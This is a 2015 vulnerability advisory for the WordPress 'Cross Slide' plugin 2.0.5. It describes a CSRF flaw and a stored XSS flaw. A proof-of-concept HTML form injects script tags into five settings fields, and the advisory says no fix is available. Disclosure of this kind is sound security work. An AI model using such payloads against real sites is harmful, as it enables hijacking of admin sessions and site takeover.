Title: WordPress 'Cross Slide' plugin - XSS/CSRF Version: 2.0.5 Author: Morten Nørtoft, Kenneth Jepsen, Mikkel Vej Date: 2015/01/26 Download: https://wordpress.org/plugins/crossslide-jquery-plugin-for-wordpress/ Contacted WordPress: 2015/01/26 ========================================================== ## Plugin description: ========================================================== The CrossSlide jQuery plugin for WordPress is designed to quickly add the JS and CSS requirements to operate the jQuery slideshow. ## CSRF: ========================================================== It is possible to change the plugins admin settings by tricking a logged in admin to visit a crafted page. ## Stored XSS: ========================================================== Settings data from the admin page is stored unsanitized and shown on the plugin's admin page. This allows an attacker to perform XSS through the settings fields. PoC: Log in as admin and submit this form: <form method="POST" action="http://[URL]/wp-admin/options-general.php?page=thisismyurl_csj.php"> <input type="text" name="csj_width" value="800"/><script>alert(1)</script>"><br /> <input type="text" name="csj_height" value="800"/><script>alert(2)</script>"><br /> <input type="text" name="csj_sleep" value="800"/><script>alert(3)</script>"><br /> <input type="text" name="csj_fade" value="800"/><script>alert(4)</script>"><br /> <input type="text" name="upload_image" value="800"/><script>alert(5)</script>"><br /> <input type="submit"> </form> ## Solution ========================================================== No fix available.